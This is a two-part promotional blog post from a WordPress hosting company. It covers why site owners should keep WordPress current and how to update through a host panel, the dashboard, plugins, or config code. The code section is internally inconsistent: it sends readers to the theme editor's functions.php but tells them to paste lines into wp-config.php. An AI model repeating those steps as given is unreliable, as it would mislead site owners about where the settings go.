Every time a new WordPress version is released, we receive emails from many of our customers asking us questions about responsible WordPress management. Should they update their WordPress theme? Is it safe? When you’re involved in managed WordPress hosting, what are the pros and cons of updating your website?

Before the next WordPress update, we thought we'd share this post that explores the impact of new WordPress versions on your WordPress management plans.

First of all, a little WordPress management history.

Unlike most website hosting platforms, WordPress is a free content management system developed by an open community of programmers. WordPress management systems are constantly evolving, with new tweaks and improvements being added all the time.

Every WordPress management update fixes bugs, adds new features, responds to user feedback, and upgrades existing capabilities in order to stay up-to-date with changing standards of technology. That means that if you don’t update your WordPress site, you'll endanger its security and could miss out on new features.

Let's take a closer look at the pros and cons of WordPress management updates.

Maintain security

Security is the most important reason why you should keep your WordPress site up-to-date. The popularity of WordPress management for all kinds of websites has made it into a magnet for hackers, malicious code distributors, thieves, and other bad actors. Approximately 23% of the world’s websites are based on WordPress.

On top of that, WordPress is an open source content management system. That means that the source code is publicly available so that anyone can study it and find ways to improve the platform, but it also means that hackers can study it for vulnerabilities that they can exploit to hack into WordPress sites.

Whenever security experts find a vulnerability or weakness, they report the bug, make quick fixes, and discuss ways to patch the weakness to keep hackers out. The vast majority of WordPress core updates are vital security updates that protect your site. They aren't something that's nice to have to make your WordPress management easier; they are vital patches that keep cyber thieves out of your website.

If you continue to use an out-of-date version of WordPress, you are vulnerable to attack. Hackers track and locate sites that are running on older versions of WordPress because they know these are easier targets.

Bear in mind that these updates don't apply only to the core WordPress management system, but also to all the plugins, themes, and templates that you use. You really need to keep each of these fully updated.

Access new features

There are loads of minor WordPress updates, but major ones only come along every now and then, and they always hold important new features and software changes. For example, WordPress 4.0 brought an enhanced plug-in experience; WordPress 4.1 introduced in-line image editing; WordPress 4.2 came with faster plug-in updates.

That means that if you are using an older WordPress version, your WordPress management will be very different, and probably much more difficult, than someone who updated their version promptly.

Improve performance

WordPress developers are constantly trying to improve site performance. Each new version comes with a number of changes that actually make WordPress work faster and more efficiently.

For example, WordPress 4.2 improved JavaScript performance for navigation menus, while WordPress 4.1 improved complex queries that helped sites that used the same queries. Since website speed is a crucial factor in SEO, we strongly recommend keeping your WordPress version updated.

Patch up bugs

Even though every version of WordPress is tested meticulously before it is released, there can still be small bugs that slip through unnoticed and they’re only found once the version is fully operational. That's why responsible WordPress management applies to even minor updates, which are updates numbered “X.X.X” like 4.2.1.

If you contact WordPress support about a problem with your WordPress management, the first question they'll ask will be about which WordPress version you’re using. Updating WordPress is usually enough to solve the issue.

The down side: Adjust for extensions and templates

The only possible downside to keeping your WordPress updated is that occasionally, it could cut off plugins, extensions, and templates that aren't using the best practices and coding standards. That's why you need to schedule frequent backups as part of your WordPress management, at least before each update. Sometimes you might also need to readjust your plugin settings after an update.

Keeping your site updated is best practice for WordPress management

Overall, the advantages that WordPress updates bring far outweigh the possible disadvantages. WordPress updates will increase security, fix bugs, improve site speed, and bring you new features. If you’d like to learn more about updating to the latest version of WordPress, check out Part II of this blog.

As managed WordPress hosting experts, we know what we're talking about, whether you need advice on updating themes, managing preventative security, or if you just need to figure out how to configure your time and date formats. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet? Click below and join us.

Why is it important to use the latest version of WordPress? Part 2 https://www.upress.io/latest-version-of-wordpress-2/ Sun, 13 Sep 2020 07:05:00 +0000 https://www.upress.io/?p=538 The first post in this series talked about the pros and cons of updating to new versions. Once you’ve decided to update, you need a step-by-step guide to doing so. Find it right here.

How to keep your WordPress site updated

As we discussed in a previous post, keeping your WordPress site updated is key to good WordPress site management, security, and performance. Now we’ll explain how to carry out the process of updating your WordPress site. 

Managed WordPress hosting updates for uPress customers

If you're already a uPress customer, then updating your WordPress site is easy. All you need to do is log in to your Admin panel and click on Choose your site » WordPress Tab » Automatic Update to WordPress, as shown in the image below.

Efficient WordPress site management is as simple as that.

Handling WordPress updates for non-uPress customers

If you are not a uPress Customer, don't panic. There are several different ways to do this and they are all pretty simple. Or, you could switch over to our managed WordPress hosting packages listed right above by clicking one of those green buttons.

Use WordPress messages

There’s a messaging system built into your WordPress site management dashboard which notifies you about updates every time you log into your WordPress account. You'll see a red circle with a number inside it near the top of your left sidebar when you log in.

Click on the Updates tab in the sidebar and follow the on-screen instructions to install the updates listed.

Receive email notifications about WordPress updates

Alternatively, you can receive an email whenever there's a new update. You just need to install the WP Updates Notifier plugin from the plugin store, and follow the instructions to activate it.

Once it's installed and activated, go to "Updates Notifier" to put your email address in the extension settings. You can choose whether to receive emails about every update, or only about core updates, theme updates, or plugin updates, then click "Save settings," or "Save settings with test email."

If you don't receive a test email, contact our customer support.

Turn on Automatic Updates

If you're using WordPress 3.7 or higher, you can turn on automatic updates for minor releases that fix bugs and other safety issues. You can also permit automatic updates for larger releases, extensions, and themes.

Be aware, though, that allowing automatic updates can be dangerous for your WordPress site management if you don't have a Dedicated Managed Storage Server that monitors for any mishaps. If you always permit automatic updates without any backup, there's a risk that an update could damage your site. Without a recent backup, you won't be able to correct it.

There are two ways to enable automatic updates: using an extension, or with code.

Using a plugin to enable automatic updates

Go to the WordPress store to install and run the Easy Updates Manager add-on.

After activation, go to Control Panel » Updates to adjust the plugin settings.

You'll see that one of the options is Automatic Updates. Here, you can turn on Automatic Updates for core WordPress site management updates, extensions, themes, and translation files updates. Once you have finished, click Save settings.

Using code to enable automatic updates (wp-config.php file)

If you're confident about handling code as part of your WordPress site management, you can permit automatic updates on a code level.

  1. Go to your WordPress menu and hover over "Appearance." In the menu that appears, click "Editor."
  2. On the right-hand side of the screen, you'll see "functions.php" or "Theme functions." Click this to go to the code editor.
  3. Copy the following line of code and paste it into the wp-config.php file.
define('WP_AUTO_UPDATE_CORE', true);

To turn on automatic updates for themes and plugins as well as for core WordPress site management updates, add these lines of code as well:

add_filter( 'auto_update_plugin', '__return_true' );

add_filter( 'auto_update_theme', '__return_true' );

That's all it takes! Hopefully, this article helped you feel in control of your WordPress site management updates.

As managed WordPress hosting experts, we know what we're talking about, whether you need advice on updating to a new version, you're debating how much bandwidth you really need, or you want the full lowdown on security. You can trust us with the entire gamut of WordPress questions, so the only one left is... why aren't we hosting your WordPress site yet? Click below and join us.
